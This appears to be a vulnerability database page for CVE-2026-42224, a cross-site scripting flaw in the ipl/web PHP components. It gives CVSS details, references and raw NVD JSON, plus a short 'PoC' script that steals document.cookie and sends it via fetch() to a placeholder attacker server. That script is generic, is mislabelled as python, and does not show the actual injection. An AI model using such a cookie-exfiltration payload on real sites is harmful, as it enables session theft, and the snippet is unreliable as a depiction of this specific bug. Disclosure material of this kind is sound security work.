CVE-2026-42224

Description

ipl/web is a set of common web components for php projects. Prior to version 0.13.1, the vulnerability allows an attacker to inject malicious Javascript into a victim's browser to run it in the context of Icinga Web. The victim needs to visit a specifically prepared website and may have no immediate chance to notice any wrongdoing. This issue has been patched in version 0.13.1.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ipl/web < 0.13.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept for CVE-2026-42224 -->
<!-- Description: Simple XSS payload to demonstrate script execution in ipl/web context -->

<script>
  // Malicious JavaScript payload
  // This demonstrates the ability to execute code in the victim's browser context
  console.log('CVE-2026-42224 Exploited: ipl/web XSS');
  
  // Example: Exfiltrate session cookies
  var cookies = document.cookie;
  var attackerUrl = 'https://attacker-controlled-server/log?c=' + encodeURIComponent(cookies);
  
  // Send data to attacker
  fetch(attackerUrl);
  
  alert('XSS Triggered in ipl/web');
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42224
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42224
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42224/
[4] VulDB https://vuldb.com/cve/CVE-2026-42224
[5] https://github.com/Icinga/ipl-web/commit/f387e92504d7a03bb857d1aee9b7410e06dd065d
[6] https://github.com/Icinga/ipl-web/releases/tag/v0.13.1
[7] https://github.com/Icinga/ipl-web/security/advisories/GHSA-55wf-5m3q-6jjf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42224", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:35.990", "lastModified": "2026-05-08T23:16:35.990", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "ipl/web is a set of common web components for php projects. Prior to version 0.13.1, the vulnerability allows an attacker to inject malicious Javascript into a victim's browser to run it in the context of Icinga Web. The victim needs to visit a specifically prepared website and may have no immediate chance to notice any wrongdoing. This issue has been patched in version 0.13.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/Icinga/ipl-web/commit/f387e92504d7a03bb857d1aee9b7410e06dd065d", "source": "[email protected]"}, {"url": "https://github.com/Icinga/ipl-web/releases/tag/v0.13.1", "source": "[email protected]"}, {"url": "https://github.com/Icinga/ipl-web/security/advisories/GHSA-55wf-5m3q-6jjf", "source": "[email protected]"}]}}